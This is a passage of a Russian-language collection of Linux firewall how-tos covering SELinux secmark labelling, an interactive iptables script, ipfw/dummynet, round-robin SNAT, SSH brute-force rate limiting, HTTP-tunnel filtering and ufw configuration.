--restore echo return } start() { # Create a chain for each class of packets we have. echo "$IPTABLES -t security -X $NAME 2> /dev/null" echo "$IPTABLES -t security -N $NAME" } fini() { # Label all other packets going internally to $TYPE:$MCS echo $IPTABLES -t security -A $NAME -j SECMARK --selctx system_u:object_r:$TYPE:$MCS echo $IPTABLES -t security -A $NAME -j CONNSECMARK --save echo $IPTABLES -t security -A $NAME -j ACCEPT echo } setup_network() { if [ ! -z "$PORTS" ]; then if [ ! -z "$NETWORK" ]; then # Send packets going to an $NET httpd to the $NAME chain echo $IPTABLES -A OUTPUT -t security -p $PROTOCOL -d $NETWORK --dport $PORTS -j $NAME echo $IPTABLES -A INPUT -t security -p $PROTOCOL -d $NETWORK --sport $PORTS -j $NAME else # Send packets going to $PORTS httpd to the $NAME chain echo $IPTABLES -A OUTPUT -t security -p $PROTOCOL --dport $PORTS -j $NAME echo $IPTABLES -A INPUT -t security -p $PROTOCOL --sport $PORTS -j $NAME fi elif [ ! -z "$NETWORK" ]; then # Send packets going to $PORT httpd to the $NAME chain echo $IPTABLES -A OUTPUT -t security -d $NETWORK -j $NAME echo $IPTABLES -A INPUT -t security -s $NETWORK -j $NAME else echo $IPTABLES -A OUTPUT -t security -j $NAME echo $IPTABLES -A INPUT -t security -j $NAME fi } usage() { $""" Usage: $0 -i Usage: $0 -T iptablescmd -P protocol -p port[:...] -N network[,...] -t selinux_type -m MCS NAME Usage: $0 -f NAME """ } echo echo "#---------------" echo "# $0 $*" echo "#---------------" echo IPTABLES=iptables NAME= PORTS= MCS=s0 NETWORK= TYPE=client_packet_t PROTOCOL=tcp FINISH=0 START=0 INIT=0 while getopts "sfin:p:m:t:T:P:" i; do case "$i" in i) INIT=1 ;; s) START=1 ;; f) FINISH=1 ;; P) PROTOCOL=$OPTARG ;; T) IPTABLES=$OPTARG ;; n) export NETWORK=$OPTARG ;; t) export TYPE=$OPTARG ;; p) export PORTS=$OPTARG ;; m) export MCS=$OPTARG ;; *) usage exit 1 esac done # Init does not require a NAME if [ $INIT == 1 ]; then init exit $? fi # Move out processed options from arguments shift $(( OPTIND - 1 )) NAME=$1 if [ -z "$NAME" -o -z "$MCS" -o -z "$NAME" ]; then usage exit 1 fi if [ $START == 1 ]; then start exit $? fi if [ $FINISH == 1 ]; then fini exit $? fi setup_network Скрипт можно запускать со следующими параметрами: Инициализируем secmark-метки: ./secmarkgen -i Определяем имя сети (имя Iptables-цепочки): ./secmarkgen -s INTERNAL Привязываем к созданной цепочке набор правил. Синтаксис команды: ./secmarkgen -T iptablescmd -P protocol -p port[:...] -N network[,...] -t selinux_type -m MCS NAME Например: ./secmarkgen -n 255.255.255.255,127/8,10.0.0.0/8,172.16.0.0/16,224/24,192.168/16 INTERNAL Для завершения формирования secmark-правил и их привязки к определенной SELinux-метке используется команда: ./secmarkgen -f NAME Например, ./secmarkgen -f -t internal_packet_t INTERNAL в итоге будет сгенерирован примерно такой скрипт: #-------------------- # ./secmarkgen -i #-------------------- iptables -F -t security iptables -t security -A INPUT -m state --state ESTABLISHED,RELATED -j CONNSECMARK --restore iptables -t security -A OUTPUT -m state --state ESTABLISHED,RELATED -j CONNSECMARK --restore #-------------------- # ./secmarkgen -s INTERNAL #-------------------- iptables -t security -X INTERNAL 2> /dev/null iptables -t security -N INTERNAL #-------------------- # ./secmarkgen -n 255.255.255.255,127/8,10.0.0.0/8,172.16.0.0/16,224/24,192.168/16 INTERNAL #-------------------- iptables -A OUTPUT -t security -d 255.255.255.255,127/8,10.0.0.0/8,172.16.0.0/16,224/24,192.168/16 -j INTERNAL iptables -A INPUT -t security -s 255.255.255.255,127/8,10.0.0.0/8,172.16.0.0/16,224/24,192.168/16 -j INTERNAL #-------------------- # ./secmarkgen -f -t internal_packet_t INTERNAL #-------------------- iptables -t security -A INTERNAL -j SECMARK --selctx system_u:object_r:internal_packet_t:s0 iptables -t security -A INTERNAL -j CONNSECMARK --save iptables -t security -A INTERNAL -j ACCEPT Для генерации iptables-правил для локальных приложений используется примерно такой скрипт (secmark_test.sh): ./secmarkgen -i ./secmarkgen -s INTERNAL ./secmarkgen -n 255.255.255.255,127/8,10.0.0.0/8,172.16.0.0/16,224/24,192.168/16 INTERNAL ./secmarkgen -f -t internal_packet_t INTERNAL ./secmarkgen -s DNS ./secmarkgen -P udp -p 53 DNS ./secmarkgen -P tcp -p 53 DNS ./secmarkgen -f -t dns_external_packet_t DNS ./secmarkgen -s EXTERNAL ./secmarkgen EXTERNAL ./secmarkgen -f -t external_packet_t EXTERNAL ./secmarkgen -T ip6tables -i ./secmarkgen -T ip6tables -s INTERNAL ./secmarkgen -T ip6tables -n FEC0::/10,::1/128,FF::/8,FE80::/10FC00::/7 INTERNAL ./secmarkgen -T ip6tables -f -t internal_packet_t INTERNAL ./secmarkgen -T ip6tables -s EXTERNAL ./secmarkgen -T ip6tables EXTERNAL ./secmarkgen -T ip6tables -f -t external_packet_t EXTERNAL Генерируем соответствующие iptables-правила: ./secmark_test.sh > /tmp/rules Устанавливать данные iptables-правила пока рано, вначале нужно определить соответствующие указанным меткам (*_packet_t) SELinux-политики, без которых использование данных меток в iptables приведет к выводу ошибки. Формируем файл с SELinux-политиками (secmark.te): policy_module(secmark, 1.0) gen_require(' attribute domain; attribute sysadm_usertype; # Domains that a staff user could transition to attribute staff_usertype; attribute telepathy_domain; type ping_t; type vpnc_t; type ssh_t; type nsplugin_t; type mozilla_plugin_t; # System domains that want to talk to the external network type ntpd_t; type sssd_t; ') # Type Definitions attribute external_packet; type internal_packet_t; corenet_packet(internal_packet_t) type dns_external_packet_t, external_packet; corenet_packet(dns_external_packet_t) type external_packet_t, external_packet; corenet_packet(external_packet_t) # Allow Rules allow domain internal_packet_t:packet { recv send }; allow sysadm_usertype external_packet:packet { recv send }; allow staff_usertype external_packet:packet { recv send }; allow vpnc_t external_packet:packet { recv send }; allow ssh_t external_packet:packet { recv send }; allow mozilla_plugin_t external_packet:packet { recv send }; allow nsplugin_t external_packet:packet { recv send }; allow telepathy_domain external_packet:packet { recv send }; allow ping_t external_packet:packet { recv send }; allow ntpd_t external_packet:packet { recv send }; dontaudit sssd_t dns_external_packet_t:packet { recv send }; Рассмотрим правила более подробно. Строка policy_module(secmark, 1.0) определяет имя модуля с политиками. Далее следует список требований gen_require(' attribute domain; ... type sssd_t; ') При написании SELinux-политики необходимо сослаться на все типы и атрибуты, чтобы их можно было использовать в правилах. Подобные ссылки указываются в блоке gen_requires. Одновременно можно определить новые типы. Если один из определенных в gen_requires атрибутов или типов будет не определен в других частях правил, SELinux не активирует созданную политику. Например, атрибут staff_usertype предоставляется всем обслуживающим пользовательским процессам, sysadm_usertype присваивается всем процессам, используемым при администрировании, домен telepathy_domain охватывает все приложения, связанные с фреймворком telepathy. Далее, в файле следуют правила определения типов и групп. Создаем атрибут external_packet для группировки всех правил, связанных с внешним трафиком. Также создаем интерфейс corenet_packet для ассоциации набора правил с пакетами. attribute external_packet; type internal_packet_t; corenet_packet(internal_packet_t) type dns_external_packet_t, external_packet; corenet_packet(dns_external_packet_t) type external_packet_t, external_packet; corenet_packet(external_packet_t) Далее указано правило, разрешающее всем процессам отправку и прием внутренних пакетов из локальной сети: allow domain internal_packet_t:packet { recv send }; Следующее правило позволяет запускаемым администраторами программам отправлять и принимать пакеты из внешних сетей (вместо указания xternal_packet_t в правиле фигурирует атрибут external_packet, который позволяет провести действие сразу над группой - external_packet_t и dns_external_packet_t): allow sysadm_usertype external_packet:packet { recv send }; allow staff_usertype external_packet:packet { recv send }; allow vpnc_t external_packet:packet { recv send }; allow ssh_t external_packet:packet { recv send }; allow mozilla_plugin_t external_packet:packet { recv send }; allow nsplugin_t external_packet:packet { recv send }; allow telepathy_domain external_packet:packet { recv send }; allow ping_t external_packet:packet { recv send }; Для сервиса ntpd заведен отдельный тип ntp_external_packet_t: allow ntpd_t external_packet:packet { recv send }; Для программы sssd запрещаем общение с системами за пределами приватной сети: dontaudit sssd_t dns_external_packet_t:packet { recv send }; Теперь приступим к компиляции, установке и применению созданной SELinux-политики: Компилируем: make -f /usr/share/selinux/devel/Makefile Устанавливаем: semodule -i secmark.pp Активируем iptables-правила: sh /tmp/rules Сохраняем внесенные изменения: service iptables save service ip6tables save С этого момента каждому сетевому пакету присваивается одна из трех созданных SELinux-меток. Для отладки следует проследить за появлением avc-сообщений и при необходимости добавить исключения с использованием правил allow/dontaudit или расследовать причину появления непрошеного трафика.

Простой интерактивный firewall в Linux Автор: tux2002 [комментарии]

Недавно на форуме спрашивали есть ли интерактивный firewall в Linux и многие отвечали, что нет. Ниже простая заготовка скрипта, следящего за событиями в логе, в случае подозрительной активности выводящего пользователю окно с предложением блокирования трафика или игнорирования предупреждения. 1. Первоначальные настройки iptables: #iptables-save # Generated by iptables-save v1.4.7 on Fri Mar 11 15:15:29 2011 *filter :INPUT DROP [137:16764] :FORWARD DROP [0:0] :OUTPUT DROP [10:708] -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT -A INPUT -j LOG --log-prefix "firewall-INPUT " -A FORWARD -m state --state RELATED,ESTABLISHED -j ACCEPT -A FORWARD -j LOG --log-prefix "firewall-FORWARD " -A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT -A OUTPUT -j LOG --log-prefix "firewall-OUTPUT " COMMIT # Completed on Fri Mar 11 15:15:29 2011 # Generated by iptables-save v1.4.7 on Fri Mar 11 15:15:29 2011 *nat :PREROUTING ACCEPT [48:6290] :POSTROUTING ACCEPT [0:0] :OUTPUT ACCEPT [6:396] COMMIT # Completed on Fri Mar 11 15:15:29 2011 Правила по умолчанию в цепочках можно изменить на ваш вкус. Основной сценарий будем запускать от рядового пользователя, поэтому ему требуется право на чтение /var/log/syslog (или куда у Вас попадает журнал netfilter). Также пользователю требуется право заполнять правила netfilter командой iptables. У меня это сделано через /etc/sudoers 2. Основной сценарий обработки журнала netfilter: interactive-firewall.sh while read line do echo $line | grep firewall > /dev/null 2>&1 [ $? != 0 ] && continue for item in $line do case $item in firewall-*) CHAIN=$item;; PROTO=*) PROTO=$item;; SRC=*) SRC=$item;; SPT=*) SPT=$item;; DST=*) DST=$item;; DPT=*) DPT=$item;; esac done CHAIN=${CHAIN#firewall-} PROTO=${PROTO#PROTO=} PROTO=${PROTO,,} SRC=${SRC#SRC=} SPT=${SPT#SPT=} DST=${DST#DST=} DPT=${DPT#DPT=} ACTION=`LANG=C xmessage -buttons ACCEPT,DROP,SKIP -default SKIP -timeout 15 -print "$SRC => $DST:$DPT"` ACTION=${ACTION:-"SKIP"} case $ACTION in SKIP) continue;; ACCEPT) sudo iptables -I $CHAIN 2 -s $SRC -d $DST -p $PROTO --dport $DPT -j ACCEPT;; DROP) sudo iptables -I $CHAIN 2 -s $SRC -d $DST -p $PROTO --dport $DPT -j DROP;; esac sleep 1 3. Запускаем firewall tail -f /var/log/syslog | ./interactive-firewall.sh 4. Что можно улучшить. В этом варианте правила имеют вид SRC => DST:PORT -j ACTION. Исходный порт соединения понятно пропускается. Хорошо бы предоставлять выбор пользователю из нескольких вариантов, но xmessage для этого маловато. Может у кого есть предложения чем рисовать вопрос пользователю и обрабатывать его выбор? По желанию сценарий можно доработать и отображать в xmessage не голые цифры, а расшифровать их в имена компьютеров командой host, а протоколы по /etc/services. Кроме модификации сценария потребуется так же разрешить первоначально DNS трафик resolver'а в первоначальной конфигурации netfilter. 5. Эта заметка ни на что не претендует, просто идея и простой набросок.

Установка ipfw и dummynet в Linux и Windows (доп. ссылка 1) [комментарии]

Не многие знают о том, что классический пакетный фильтр FreeBSD ipfw и система ограничения пропускной способности dummynet были успешно портированы в Linux и Windows. В Ubuntu для сборки могут потребоваться пакеты: $ sudo apt-get install build-essential linux-source linux-headers-$(uname -r) Собираем ipfw и dummynet в Linux: $ wget http://info.iet.unipi.it/~luigi/dummynet/20100319-ipfw3.tgz $ tar xzf 20100319-ipfw3.tgz -C ~/src $ cd ~/src/ipfw3 $ make Загружаем модуль Linux-ядра: $ sudo insmod ./dummynet2/ipfw_mod.ko $ lsmod| grep ipfw ipfw_mod 86695 0 Проверяем работу утилиты: $ sudo ipfw/ipfw show 65535 54 6340 allow ip from any to any $ sudo ipfw/ipfw 10 add deny ip from 192.168.100.100 to any 00010 deny ip from 192.168.100.100 to any $ sudo ipfw/ipfw show 00010 1 84 deny ip from 192.168.100.100 to any 65535 121 22335 allow ip from any to any Для Windows достаточно загрузить со страницы http://info.iet.unipi.it/~luigi/dummynet/ готовые исполняемые файлы. Для установки драйвера в панели конфигурации сетевой карты ( Control Panel -> Network -> карта) перейти в Properties->Install->Service->Add, выбрать 'Driver Disk' и указать на файл 'netipfw.inf', после чего выбрать 'ipfw+dummynet'.

Round Robin балансирование IP адресов исходящих соединений средствами iptables (доп. ссылка 1) Автор: Stanislav S. Osipov [комментарии]

Данное решение отличается изящностью, так как реализует все средствами iptables. Синтаксис: на машине, которая должна балансировать исходящие соединения, выполнить скрипт balancer.sh: sh ./balancer.sh Выключить балансер: sh ./balancer.sh off Замечание: При работе создается временный файл ~/balancer-rules.sav, используемый для уборки за собой при выключении балансера. balancer.sh #!/bin/bash # Written by Stanislav S. Osipov, demofly@mail.ru # Created 2010.08.08 # Script makes SNAT round robin balancing for connections between all real IPA of this host # # OpenVZ guest warning: you must allow the next options: # IPTABLES="ip_tables iptable_filter iptable_mangle iptable_nat ip_conntrack ipt_conntrack ipt_state" myips=`/sbin/ifconfig | /bin/grep "inet a" | /usr/bin/awk "{print \\$2}" | /usr/bin/cut -d: -f2 | /bin/grep -v "^127\.\|^10\.\|^192\.168\.\|^172\.$[12][0-9]\|3[01]$\."` myipscount=`/sbin/ifconfig | /bin/grep "inet a" | /usr/bin/awk "{print \\$2}" | /usr/bin/cut -d: -f2 | /bin/grep -v "^127\.\|^10\.\|^192\.168\.\|^172\.$[12][0-9]\|3[01]$\." | /usr/bin/wc -l` if [ $myipscount -lt 2 ] && [ "$1" != "off" ] then /bin/echo "you have not enough IPAs for balancing" /bin/echo "I have $myipscount IPAs:" /bin/echo $myips exit 0 fi #for connections, initiated from this host chain="OUTPUT" #for connections, initiated by other hosts, which go through this host #chain="FORWARD" /bin/echo "Cleaning old balancer iptables rules..." if [ -e ~/balancer-rules.sav ] then /bin/cat ~/balancer-rules.sav | /bin/bash /bin/echo > ~/balancer-rules.sav else /bin/echo "No previously dumped rules was found." fi /bin/echo "Cleaning was done." if [ "$1" == "off" ] then if [ -e ~/balancer-rules.sav ] then rm ~/balancer-rules.sav fi exit 0 fi /bin/echo "I have $myipscount IPAs: $myips Generating and writing mangle table mark logic rules..." i=1 while [ $i -le $myipscount ] do RULE1="/sbin/iptables -t mangle -A $chain -j CONNMARK --set-mark $i" RULE2="/sbin/iptables -t mangle -A $chain -m statistic --mode nth --every $((myipscount-i+1)) -j RETURN" /bin/echo $RULE1 $RULE1 /bin/echo $RULE2 $RULE2 /bin/echo $RULE1 | /bin/sed -e "s# -A # -D #" >> ~/balancer-rules.sav /bin/echo $RULE2 | /bin/sed -e "s# -A # -D #" >> ~/balancer-rules.sav ((i++)) done /bin/echo "...mangle table mark rules was done." /bin/echo "Writing SNAT mark based rules:" i=1 for ip in $myips do RULE="/sbin/iptables -t nat -A POSTROUTING -m connmark --mark $i -j SNAT --to $ip" /bin/echo $RULE $RULE /bin/echo $RULE | /bin/sed -e "s# -A # -D #" >> ~/balancer-rules.sav ((i++)) done /bin/echo "...nat table SNAT rules was done. Round robin balancer is turned on. Thank you for using this script written by Stanislav S. Osipov!" Как проверить Создать файл в DocumentRoot на какой-нить машине с апачом такого вида: `ip.php`: <? echo $_SERVER['REMOTE_ADDR']."\n"; ?> И запустить такой тест с машины, которая работает с правилами балансера (для успешного теста на машине должна стоять библиотека libwww-perl): i=1; count=20; url="http://my.www.ru/ip.php"; while [ $i -lt $count ]; do GET "$url"; ((i++)); done Как выглядит в работе root@h1:~# i=1; count=10; url="http://my.www.ru/ip.php"; while [ $i -lt $count ]; do GET "$url"; ((i++)); done 95.239.178.214 95.239.178.214 95.239.178.214 95.239.178.214 95.239.178.214 95.239.178.214 95.239.178.214 95.239.178.214 95.239.178.214 root@h1:~# ./balancer.sh Cleaning old balancer iptables rules... No previously dumped rules was found. Cleaning was done. I have 3 IPAs: 95.239.178.214 95.239.178.220 95.239.178.221 Generating and writing mangle table mark logic rules... /sbin/iptables -t mangle -A OUTPUT -j CONNMARK --set-mark 1 /sbin/iptables -t mangle -A OUTPUT -m statistic --mode nth --every 3 -j RETURN /sbin/iptables -t mangle -A OUTPUT -j CONNMARK --set-mark 2 /sbin/iptables -t mangle -A OUTPUT -m statistic --mode nth --every 2 -j RETURN /sbin/iptables -t mangle -A OUTPUT -j CONNMARK --set-mark 3 /sbin/iptables -t mangle -A OUTPUT -m statistic --mode nth --every 1 -j RETURN ...mangle table mark rules was done. Writing SNAT mark based rules: /sbin/iptables -t nat -A POSTROUTING -m connmark --mark 1 -j SNAT --to 95.239.178.214 /sbin/iptables -t nat -A POSTROUTING -m connmark --mark 2 -j SNAT --to 95.239.178.220 /sbin/iptables -t nat -A POSTROUTING -m connmark --mark 3 -j SNAT --to 95.239.178.221 ...nat table SNAT rules was done. Round robin balancer is turned on. Thank you for using this script written by Stanislav S. Osipov! root@h1:~# i=1; count=10; url="http://my.www.ru/ip.php"; while [ $i -lt $count ]; do GET "$url"; ((i++)); done 95.239.178.214 95.239.178.221 95.239.178.220 95.239.178.214 95.239.178.221 95.239.178.220 95.239.178.214 95.239.178.221 95.239.178.220 root@h1:~# ./balancer.sh off Cleaning old balancer iptables rules... Cleaning was done. root@h1:~# i=1; count=10; url="http://my.www.ru/ip.php"; while [ $i -lt $count ]; do GET "$url"; ((i++)); done 95.239.178.214 95.239.178.214 95.239.178.214 95.239.178.214 95.239.178.214 95.239.178.214 95.239.178.214 95.239.178.214 95.239.178.214

Защита от bruteforce средствами iptables (доп. ссылка 1) Автор: Владимир [комментарии]

В заметке приведены различные варианты защиты от bruteforce-атак, на примере блокирования последовательного подбора паролей через ssh. Общий шаблон правил iptables -P INPUT DROP iptables -P OUTPUT DROP iptables -P FORWARD DROP iptables -A INPUT -p all -i lo -j ACCEPT iptables -A OUTPUT -p all -o lo -j ACCEPT Здесь будут наши правила (вариант) iptables -A INPUT -p all -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A OUTPUT -p all -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT Вариант 1, используя модуль recent: Добавляем ip в таблицу iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m recent --name BLOCK -set С одного ip разрешаем 2 (--hitcount 3-1) запроса на соединение (NEW) в минуту (60 секунд), третье блокируется и все последующие в течение минуты iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m recent --name BLOCK --update --seconds 60 --rttl --hitcount 3 -j DROP Разрешаем входящие соединения на 22 порт iptables -A INPUT -p tcp --syn --dport 22 -j ACCEPT Вариант 2, используя модуль hashlimit: С одного ip разрешаем 2 запроса на соединение (NEW) в минуту (2/m) все остальные пакеты (NEW) c этого ip блокируется iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m hashlimit \ --hashlimit-name BLOCK --hashlimit-mode srcip --hashlimit-above 2/m --hashlimit-burst 2 -j DROP Разрешаем входящие соединения на 22 порт iptables -A INPUT -p tcp --syn --dport 22 -j ACCEPT Вариант 3, используя модули connlimit, limit: С одного ip разрешаем не больше одно соединения (! --connlimit-above 1) на 22 порт, пропускаем 2 пакета в минуту с запросом на соединение (NEW), все остальные пакеты (NEW) c этого ip блокируется iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m connlimit ! \ --connlimit-above 1 -m limit --limit 2/m --limit-burst 2 -j ACCEPT Вариант 4, параноидальный: Два раза в течение минуты разрешено подключаться к 22 порту, при превышении порога ip блокируется на 10 минут. блокируем ip с запросом на соединение (NEW) попавшие в динамически обновляемую таблицу на 600 секунд iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m recent --name BLOCK --rcheck --seconds 600 -j DROP С одного ip разрешаем 2 запроса на соединение (NEW) в минуту (2/m), если превышен порог,то добавляем ip в таблицу BLOCK для блокировки на 600 секунд (10 минут) iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m hashlimit \ --hashlimit-name BLOCK --hashlimit-mode srcip --hashlimit-above 2/m --hashlimit-burst 2 -m recent --name BLOCK --set -j DROP Разрешаем входящие соединения на 22 порт iptables -A INPUT -p tcp --syn --dport 22 -j ACCEPT

Защита от спамерских и bruteforce-атак с помощью iptables Автор: Забудкин Лев Мирославович [комментарии]

Сохраняем в файл скрипт: #!/bin/sh # Защита от спамовских атак и от BRUTE-атак с помощью IPTABLES # REJECT_BRUTERS v.1.0 Lev Zabudkin. zabudkin@mail.ru. http://zabudkin.ru # 23.03.2010 # # Описание: # Данный скрипт позволяет Вам, используя iptables заблокировать # дальнейшие попытки соединения от надоедливых хостов, # которые пытались приконнектиться в течении определенного Вами времени # и определенное Вами количество раз. # # Итак поехали: # # Мы создаём ниже переменную IPTABLES, дабы не указывать постоянно где он лежит # Где у Вас лежит iptables? (подсказка: # whereis iptables) IPTABLES="/sbin/iptables" # На каком сетевом интерфейсе контролировать коннекты CHECK_INT="ppp0" # Сколько именно коннектов Вы разрешаете с одного хоста? # В данном случае указано 2, чего вполне достаточно для SMTP. MAXIMUM_CONNECTIONS_PER_PERIOD=2 # А в течение скольки секунд они разрешены? PERIOD_SECONDS=60 # Пояснение: Если в течении Выше указанных секунд хост (в данном примере любой(!)) # попытается приконнектиться к Вам, то соединение будет отброшено (см. -j DROP) # причем НАВСЕГДА, т.е ДО ТЕХ ПОР, пока Вы не обнулите цепочку BRUTE_CHECK # ключём -F BRUTE_CHECK команды iptables # Создаём цепочку BRUTE_CHECK $IPTABLES -N BRUTE_CHECK # Обнуляем правила цепочки BRUTE_CHECK $IPTABLES -F BRUTE_CHECK # В данном случае мы удаляем ранее сделанное "перенаправление" (см. чуть ниже) # чтобы этот скрипт можно было вызывать многократно $IPTABLES -D INPUT -j BRUTE_CHECK # В данном случае мы "перенаправляем" для обработки входящие пакеты # в нашу созданную цепочку $IPTABLES -A INPUT -j BRUTE_CHECK # А тут уже пошли наши правила, которые гласят: # все входящие пакеты на сетевой интерфейс (мы его указали выше), # которые являются для нас новыми (см. state) и которые соответствуют нашим # параметрам (см. выше), мы отбрасываем. $IPTABLES -A BRUTE_CHECK -i $CHECK_INT -p tcp -m state --state NEW -m recent --set --name BRUTE # См. Ниже Пояснение, если понадобится, то раскоментируете нижеприведенную строку # (просто уберите символ решетки - #) #$IPTABLES -A BRUTE_CHECK -i $CHECK_INT -p tcp -m state --state NEW -m recent --update --seconds $PERIOD_SECONDS \ # --hitcount $MAXIMUM_CONNECTIONS_PER_PERIOD --rttl --name BRUTE -j LOG --log-level 4 --log-prefix '** BRUTE **' $IPTABLES -A BRUTE_CHECK -i $CHECK_INT -p tcp -m state --state NEW -m recent --update --seconds $PERIOD_SECONDS \ --hitcount $MAXIMUM_CONNECTIONS_PER_PERIOD --rttl --name BRUTE -j DROP Пояснение: Для того, чтобы видеть, каких же успехов Вы добились, применив выше написанное, проделайте следующее: откройте файл /etc/syslog.conf и добавьте в конец строку: kern.warning /var/log/iptables.log затем перезапустите syslog: /etc/init.d/syslog restart (если у Вас Ubuntu, то наверное это sysklogd) События (про попытки) будут записываться в файл /var/log/iptables.log, его и смотрите. Да, и будет не лишним добавить данный скрипт в CRON (/etc/crontab), скажем каждые 5 минут: */5 * * * * root Путь/ВашСкрипт

Защищаем http-proxy от пробрасывания http-туннеля средствами iptables (доп. ссылка 1) Автор: Владимир [комментарии]

При пробрасывании http-туннеля через http-прокси, http-заголовок пакета имеет аномально маленький размер, порядка 80-90 байт, так как передается лишь минимальный набор данных. Заголовок передаваемых браузером запросов обычно не бывает меньше 350 байт. Основываясь на данной особенности можно отфильтровать проброшенных поверх http-прокси туннели. # политика по умолчанию iptables -P INPUT DROP iptables -P OUTPUT DROP iptables -P FORWARD DROP # создаём новую цепочку LENGTH iptables -N LENGTH # проверяем длину пакета, если меньше 350 байт то блокируем iptables -A LENGTH -p tcp --dport 3128 -m length --length :350 -j DROP # если пакет больше 350 байт то пропускаем iptables -A LENGTH -p tcp --dport 3128 -j ACCEPT # разрешаем подключение на порт 3128 iptables -A INPUT -p tcp --syn --dport 3128 -j ACCEPT # в установленом соединении проверяем пакеты на запрос GET --hex- string "|47 45 54 20|" # если есть такой пакет то направляем его в цепочку LENGTH для проверки длины пакета iptables -A INPUT -p tcp --dport 3128 -m state --state ESTABLISHED -m string --algo kmp \ --hex-string "|47 45 54 20|" --from 52 --to 56 -j LENGTH iptables -A INPUT -p all -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A OUTPUT -p all -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT Представленный пример опробован на httptunnel

Настройка ufw в Ubuntu (доп. ссылка 1) Автор: Eugene Shelepov [комментарии]

Начиная с версии Ubuntu 8.04 в ее состав по умолчанию включена новая упрощенная оболочка для работы с файрволом - ufw (Uncomplicated firewall - "незамысловатый" брэндмауер). Как известно Linux по умолчанию имеет очень мощный встроенный сетевой фильтр - netfilter. Стандартной утилитой для управления настройками netfilter является утилита iptables. Ufw создан для того чтобы сделать более простым настройку netfilter-а. По сути ufw - это скрипт, который получает команды в одном формате и преобразует их в формат iptables. Так как ufw является упрощенной утилитой настройки файрвола, он так же является и более ограниченным в своих возможностях по сравнению с iptables. Практика показывает что большинству пользователей вполне достаточно функционала который предоставляет ufw. В то же время, в случае необходимости всегда можно дописать нужное правило с помощью iptables. Функционал ufw Основными функциями файрвола ufw является: 1. Работа в одном из двух режимов: разрешено все кроме того что описано правилами, запрещено все, кроме описанного правилами. 2. Создание правил для фильтрации пакетов с действиями allow, deny, reject 3. Создание правил с учетом адреса и порта получателя и отправителя, используемого протокола 4. Логирование пакетов подпадающих под правило 5. Блокировка частых неправильных попыток авторизации по ssh 6. Настраиваемые профили для приложений Запуск ufw Ufw может быть включен или выключен системным администратором сервера, для этого используется команд: # ufw enable Межсетевой экран активен и будет запущен при запуске системы # ufw disable Файрвол остановлен и деактивирован при загрузке Просматривать состояние можно с помощью команды: # ufw status [numbered] Status: active Параметр numbered может быть использован для отображения правил файрвола с соответствующей нумерацией. Изменение политики по умолчания: # ufw default allow [in|out] # ufw default deny [in|out] # ufw default reject [in|out] Где allow подразумевает что все пакеты будут пропущены, кроме тех, для которых есть запрещающее правило: deny - все пакеты будут заблокированы, кроме тех, для которых есть разрешающие правила; reject - все пакеты будут заблокированы с соответствующим уведомлением подключающуюся сторону. Параметры in|out указывают для какого направления мы хотим применять политику, для входящих или исходящих пакетов соответственно. Управление правилами осуществляется с помощью команд allow, deny, reject, delete, insert. allow - добавить разрешающее правило deny - добавить запрещающее правило (файрвол не предпринимает действий при попадании в это правило) reject - добавить запрещающее правило (файрвол даст знать подключающемуся что этот порт закрыт) limit - добавляет ограничивающее правило для указанного порта. В случае если с одного и того же адреса в течении 30 секунд будет произведено 6 и более неуспешных попыток авторизации в службу удаленного доступа ssh, ufw заблокирует удаленный адрес. delete - удалить добавленное ранее правило insert - вставить правило в определенную позицию в цепочке Построение правил файрвола Конструкция построения правил ufw allow|deny|reject|limit [in|out on INTERFACE] [log|log-all] [proto protocol] \ [from ADDRESS [port PORT]] [to ADDRESS [port PORT]] Подробнее о параметрах: allow|deny|reject|limit - указываем что будет делать это правило (см. описание выше). [in|out on INTERFACE] - указываем будет это правило относится к входящему трафику (in) или исходящему (out) и хотим ли мы ограничить данное правило отдельным сетевым интерфейсом (к примеру eth0). [log|log-all] - при желании можно логировать события которые подпадают под правило. По умолчанию лог пишется в /var/log/syslog. При использовании опции log - в файл будут записаны лишь пакеты участвующие при установке соединения с сервером. Используя опцию log-all в лог файл будут записаны все пакеты подпадающие под правило. [proto protocol] - в правиле можно указать для какого протокола оно действует: tcp или udp. [from ADDRESS [port PORT]] - адрес и порт источника пакета [to ADDRESS [port PORT]] - адрес и порт получателя пакета Профили приложений Ufw позволяет создавать профили приложений. в которых можно указать все порты которые используются и удобно добавлять их в правила. Так к примеру можно создать профиль для веб-сервера Apache, указав что слушает он 80 и 443 порты по протоколу tcp. Профили приложений являются текстовыми файлами и могут быть отредактированы любым текстовым редактором. все файлы хранятся в директории /etc/ufw/applications.d: root@server:/etc/ufw/applications.d# pwd /etc/ufw/applications.d root@server:/etc/ufw/applications.d# ls -l -rw-r--r-- 1 root root 406 2009-11-13 00:52 apache2.2-common -rw-r--r-- 1 root root 145 2009-10-22 22:50 openssh-server -rw-r--r-- 1 root root 241 2009-09-22 16:52 postfix Рассмотрим пример профиля приложения apache2.2-common: [Apache] title=Web Server description=Apache v2 is the next generation of the omnipresent Apache web server. ports=80/tcp [Apache Secure] title=Web Server (HTTPS) description=Apache v2 is the next generation of the omnipresent Apache web server. ports=443/tcp [Apache Full] title=Web Server (HTTP,HTTPS) description=Apache v2 is the next generation of the omnipresent Apache web server. ports=80,443/tcp В одном файле может находится несколько профилей. В данном примере 3: Apache, Apache Secure, Apache Full. Структура записей проста: сначала имя профиля в квадратных скобка ([Apache Full]), далее развернутое наименования приложения, далее описание приложения и список портов с указанием протокола которые задействованы в профиле (80,443/tcp). Вывести список профилей можно с помощью команды: # ufw app list Доступные приложения: Apache Apache Full Apache Secure OpenSSH Postfix Postfix Submission Детальную информацию по профилю можно просмотреть с помощью команды: # ufw app info OpenSSH |Профиль: OpenSSH |Название: Secure shell server, an rshd replacement |Описание: OpenSSH is a free implementation of the Secure Shell protocol. |Порт: 22/tcp После добавления или изменения профиля приложения (в файле) необходимо дать знать файрволу о новом профиле: # ufw app update OpenSSH Для того чтобы новый профиль сразу вступил в силу, необходимо добавить опцию --add-new: # ufw app update --add-new 